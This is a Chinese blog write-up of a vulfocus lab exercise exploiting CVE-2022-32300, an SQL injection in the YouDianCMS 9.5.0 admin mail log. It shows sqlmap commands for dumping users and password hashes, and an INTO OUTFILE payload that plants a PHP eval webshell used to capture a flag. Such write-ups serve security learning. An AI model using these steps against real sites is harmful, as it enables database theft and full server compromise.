vulfocus youdiancms 9.5.0 版本 SQL注入 (CVE-2022-32300)

最新推荐文章于 2024-07-18 09:35:46 发布
最新推荐文章于 2024-07-18 09:35:46 发布
阅读量726 收藏 3
点赞数 1
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_61913198/article/details/133933507
版权

名称: youdiancms 9.5.0 版本 SQL注入 (CVE-2022-32300) 

描述: 友点企业网站管理系统(简称YouDianCMS系统)集PC站、手机站、微网站、多端小程序(微信、百度、抖音/头条、支付宝、QQ、360小程序)、APP于一体,共用空间,数据同步,是国内开源十站合一优秀企业建站解决方案。 通过 /App/Lib/Action/Admin/MailAction.class.php 中的 MailSendID 参数发现 YoudianCMS v9.5.0 包含 SQL 注入漏洞。 数据库:root/root 数据库名:youdian 

复现:

安装

查询漏洞信息可知,漏洞发生位置位于

/index.php/Admin/mail/viewLog?MailSendID=1

登陆后台使用被动扫描访问该地址,Xray成功扫描出该地址存在sql注入漏洞

然后使用sqlmap一把梭,注意,这里需要使用抓包方式注入,因为是后台sql注入,会校验cookie,直接复制xray数据包,删除payload进行注入

python2 sqlmap.py -r data.txt

读取用户名

python2 sqlmap.py -r data.txt --users --threads 10

读取密码

python2 sqlmap.py -r data.txt --passwords --threads 10

然后使用cmd5解密

Mysql连接

mysql -uroot -proot -hip -P port

获取网站绝对路径,这里发现在访问install.php时会泄露网站绝对路径

构造payload,写入一句话木马

SELECT "<?php eval(@$_POST['password']);?> " INTO OUTFILE '/var/www/wordpress/include/Db/1.php';

写入成功后,蚁剑连接

成功获取flag

/tmp/flag-{bmh45e6ef4a-dc8c-4fe3-824f-eeba237afa20}

Dulvren_
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
YouDianCMS
04-06
友点企业网站管理系统集电脑站、手机站、微信、APP、小程序于一体,共用空间,数据同步,是国内五站合一优秀解决方案。系统采用PHP开发,具有操作简单、功能强大、稳定性好、易扩展、安全性强、维护方便等特点,可帮您快速构建一个强大专业的企业网站。系统支持多语言、自定义模型、SEO优化、静态页生成、评论留言、购物车、在线支付、订单管理、会员、广告、招聘等企业网站基本功能。运行环境:PHP5.2+MYSQL+Zend Optimizer 3.3或PHP5.3+MYSQL+Zend Guard Loader 3.3 一、友点企业网站管理系统YouDianCMS系统特点 1)电脑站+手机站+微信五站合一 节约成本 电脑站、手机站、微信、APP、小程序五站合一:共用一个管理后台;只要录入一次数据,五站数据自动同步,降低人力维护工作量;只要一个虚拟主机,有效节约空间投资。 2)操作简单方便 即看即懂 后台操作简单方便 ,一看即懂,无需花大量时间学习,让您更专注于企业网站运营、策划、销售等业务活动。 3)模板精心设计 兼容各主流浏览器 模板采用DIV+CSS布局,并兼容 IE6/7/8/9/10、Google Chrome、Firefox、Opera、Webkit、搜狗、360、遨游等浏览器。 4)内置SEO功能 提升网站搜索引擎排名 SEO功能包含页面标题、关键词、描述设置;搜索引擎提交;关键词内链自动生成;页面静态名称自定义;伪静态/静态;网站地图生成等功能。 5)多语言支持 轻松打造国际站 支持中文、英语、中英双语,可自行在后台设置,是外贸网站首选。 6)支持网站换肤 多套模板任意切换 系统支持安装多套网站模板,可以一键切换模板而无需重新录入网站资料,可轻松换肤。 7)自动生成HTML静态文件 减少维护量 采用先进的静态HTML缓存策略技术,通过设置一个缓存时间,可以自动生成静态HTML文件,而无需人工生成HTML,从而减少维护工作量。 8)一键备份全站 轻松完成网站迁移 系统内置一键备份全站资料和数据库功能,让非技术人员也能轻轻松松将网站从一台服务器迁移到另一台服务器。 9)可以自己动手设计模板 产品设计采用MVC模式开发,前台(模板)和后台完全分离,利用我们提供的模板标签手册,不用懂编程也可以自己动手设计和修改模板。 二、微信网站功能 1、 关注自动回复: 关注公众号回复信息,可设置文本消息,图文消息和音乐消息 2、 关键词自动回复 3、 一键拔号 4、 一键导航 5、 地理位置回复 发送地理位置后,可查询附近的指定地点的位置,如输入“附近300米酒店”即可返回附近300米酒店的信息 6、 自定义微菜单:便捷直面,随意定制,快速引导,精确定位 7、 微活动:幸运大转盘和刮刮卡 8、 微会员卡:微时代,永不挂失的会员卡,可每日签到吸引粉丝参与的积极性,可分兑换,发放优惠卷等功能 9、 微查询:如天气查询、手机归属地查询、公交换乘查询、公交查询、火车车次查询、健康指数查询、翻译、快递查询、股票查询、人品计算、周公解梦、成语词典、邮编查询、菜谱、糗事、笑话等查询 10、 微调查:无需人力,电子调查,为调研添加有力数据 11、 微投票 12、 微网站:网站栏目可自定义,与电脑站同步数据,共用后台和空间 YouDianCMS7.4版 更新日志: 1.[增加]管理后台增加【插件管理】功能,并将数据采集、邮件群发移动至插件管理 2.[增加]增加【三级分销】插件 3.[增加]增加【七牛云】插件,可以将网站静态资源(如:图片、css样式、js脚本等)镜像到七牛云,从而大大提高网站速度;也可以将大文件直接上传到七牛云,支持断点续传 4.[优化]全面升级后台编辑器ckeditor至最新4.8版本,支持多图插入和上传、设置行高、从word文档可以直接粘贴图片并自动上传到服务器、高版本ie打开编辑器不再有兼容问题 5.[增加]产品规格属性增加图片,增强用户体验 6.[增加]实现发布文章时自动将地址推送到百度,通知百度收录,更有利于SEO 7.[增加]在后台【其他设置】能够设置登陆地址 8.[增加]频道模型增加【地理位置】类型字段,点击打开百度地图,可以可视化获取经纬度 9.[增加]频道模型增加【颜色】类型字段,可以可视化选择颜色 10.[优化]为了便于设置权限,自动生成的网站地图已经放到Data/map目录下 11.[优化]目前权限设置更简单:安装好系统后,请将整个系统根目录设置为只读,然后再将/Data目录和/Upload目录设置为可读写去可执行权限,可有效防止网站被攻击 12.[增加]模板配置变量,频道列表增加了【不显示当前版块】,以便控制前台版块隐藏和显示 13.[增加]在后台可以设置搜索页面分页条数 14.[优化]简化上传步骤,点击【上传】
chilkat-9.5.0-python-3.7-x64.zip
03-19
"chilkat-9.5.0-python-3.7-x64.zip"是一个压缩包文件,其中包含针对64位Windows系统、Python 3.7版本的Chilkat库。Chilkat是一家知名的软件开发公司,他们提供了一系列用于处理各种网络任务的API,如FTP上传下载、...
youdiancms 9.5.0 版本 SQL注入CVE-2022-32300
最新发布
qq_23003811的博客
07-18 189
友点企业网站管理系统(简称YouDianCMS系统)集PC站、手机站、微网站、多端小程序(微信、百度、抖音/头条、支付宝、QQ、360小程序)、APP于一体,共用空间,数据同步,是国内开源十站合一优秀企业建站解决方案。通过 /App/Lib/Action/Admin/MailAction.class.php 中的 MailSendID 参数发现 YoudianCMS v9.5.0 包含 SQL 注入漏洞。数据库:root/root 数据库名:youdian。3、接下来就是爆表名、爆字段和数据找flag了。
友点 9.5.0 版本 SQL注入(CVE-2022-32300)
qq_51780583的博客
05-17 315
vulfocus youdiancms 9.5.0 版本 SQL注入CVE-2022-32300
漏洞复现|youdiancms 9.5.0 版本 SQL注入CVE-2022-32300
weixin_50791426的博客
11-26 3152
友点企业网站管理系统(简称YouDianCMS系统)集PC站、手机站、微网站、多端小程序(微信、百度、抖音/头条、支付宝、QQ、360小程序)、APP于一体,共用空间,数据同步,是国内开源十站合一优秀企业建站解决方案。通过 /App/Lib/Action/Admin/MailAction.class.php 中的 MailSendID 参数发现 YoudianCMS v9.5.0 包含 SQL 注入漏洞。易受攻击的URL为:/index.php/Admin/mail/viewLog?
youdiancms 9.5.0 版本 SQL注入vulfocus复现)
qq_40646572的博客
04-24 1287
从上述信息,可以看到,web服务的80端口被映射到62461端口,并且该服务对外开启了3306端口并映射到20130 端口。并且给了数据库的相关信息。
Goby漏洞更新 | YoudianCMS v9.5.0 sql注入CVE-2022-32300
m0_46699477的博客
04-06 850
YouDianCMS是一个网站CMSYoudianCMS v9.5.0版本存在安全漏洞,该漏洞源于通过/App/Lib/Action/Admin/MailAction.class.php处的MailSendID参数发现存在SQL注入漏洞。
vulfocus——Django SQL注入(CVE-2021-35042)
m0_62063669的博客
09-17 850
如果 order_by 是来自 Web 应用程序客户端的不受信任的输入,则 3.1.13 之前的 Django 3.1.x 和 3.2.5 之前的 3.2.x 允许 QuerySet.order_by SQL 注入。2.根据提示访问,根据返回的信息可得出order传入的值可控。3.利用堆叠+报错进行注入(flag在报错页面的下面)(当为“id”正序排列,当为“-id”反序排列)
chilkat-9.5.0-python-2.7-x86-linux.tar.gz
03-19
"chilkat-9.5.0-python-2.7-x86-linux.tar.gz" 是一个针对Python 2.7版本、32位Linux系统的Chilkat库的压缩包文件。Chilkat是一家知名的软件开发公司,他们提供了一系列强大的API和类库,用于处理各种复杂的编程任务...
chilkat-9.5.0-python-2.7-x86_64-linux.tar.gz
03-19
在给定的压缩包文件"chilkat-9.5.0-python-2.7-x86_64-linux.tar.gz"中,我们可以找到适用于Python 2.7版本且基于x86_64架构(64位)的Linux系统的Chilkat库。这个压缩包包含了Chilkat 9.5.0版本的所有必要组件,...
chilkat-9.5.0-python-3.5-x64.zip
03-19
"Chilkat-9.5.0-Python-3.5-x64.zip" 是一个针对64位Windows操作系统、Python 3.5版本的Chilkat类库的压缩包。Chilkat是一家知名的软件开发公司,他们提供了一系列用于处理各种网络任务的API和库,包括但不限于邮件...
YouDianCMS v9.5.0 开源十合一建站系统
02-04
YouDianCMS即友点企业网站管理系统集PC站+手机站+微网站+多端小程序(微信、百度、抖音/头条、支付宝、QQ、360小程序)+APP十站合一,数据自动同步,降低人力维护成本;共用一个管理后台,只要一个服务器,有效节约空间投资。系统采用开源技术PHP+MYSQL开发,开源且具有操作简单、功能强大、稳定性好、易扩展、安全性强、维护方便、兼容性好等特点,可帮您快速构建一个强大专业的企业网站。系统支持多语言轻松打造国际站、自定义模型、支持网站模板换肤、内置SEO优化功能、静态页、评论留言、购物车、在线支付、优惠券、积分、三级分销、订单管理、会员、数据采集、短信接口、插件应用商店、广告等企业网站基本功能。运行环境:PHP5.3/5.4/5.5/5.6/7.0/7.1/7.2/7.3/8.0 + MYSQL。 运行环境: 操作系统:跨平台,支持Windows、Unix、Linux等操作系统 WEB服务器:IIS/APACHE/NGINX等 PHP环境:PHP5.3-8.0 数据库:MYSQL5.0-8.0
vulfocus phpmyadmin SQL注入CVE-2020-5504)
weixin_61913198的博客
10-19 436
描述: phpMyAdmin是Phpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。然后来到sql命令执行处可以直接执行sql命令,现在想要上传webshell需要找到网站绝对路径,常规思路让网站报错或者找phpinfo,找了一大圈没找到,这个时候就需要猜网站绝对路径了,还记得前面那个nginx嘛?访问http://ip/pma/index.php登陆,账号密码为admin 123456。
[Vulfocus解题系列]skywalking SQL注入CVE-2020-9483)
00勇士王子的博客
01-12 3748
描述 Apache SkyWalking是美国阿帕奇软件(Apache Software)基金会的一款主要用于微服务、云原生和基于容器等环境的应用程序性能监视器。 当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 复现过程 注:本次复现使用在线靶场http://vulfocus.fofa.so 打开环境 加上路径抓包 /graphql 改成post,加上payload,利用报错注入
【漏洞复现-django-SQL注入vulfocus/django-cve_2019_14234
10-12 1255
【django-SQL注入】参数注入
【漏洞复现-django-SQL注入vulfocus/django-cve_2022_28346
10-12 1717
【django-SQL注入】可控参数注入
一次CTF获取Flag的过程
战神/calmness的博客
05-11 9244
获取Flag 目录 Nmap扫描端口 dirb或者 dirsarch,御剑等工具进行目录遍历 修改Cookie得到管理员 SQL注入 文件包含 文件上传 RCE Nmap扫描端口 dirb或者 dirsarch,御剑等工具进行目录遍历 修改Cookie得到管理员 SQL注入 文件包含 参数file= /etc/passwd 之后,PHP伪协议 http://192.168.181.136/show_employee.php...
学习日记-漏洞扫描
qq_45849014的博客
08-18 310
1.PHPstudy,小皮面板。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值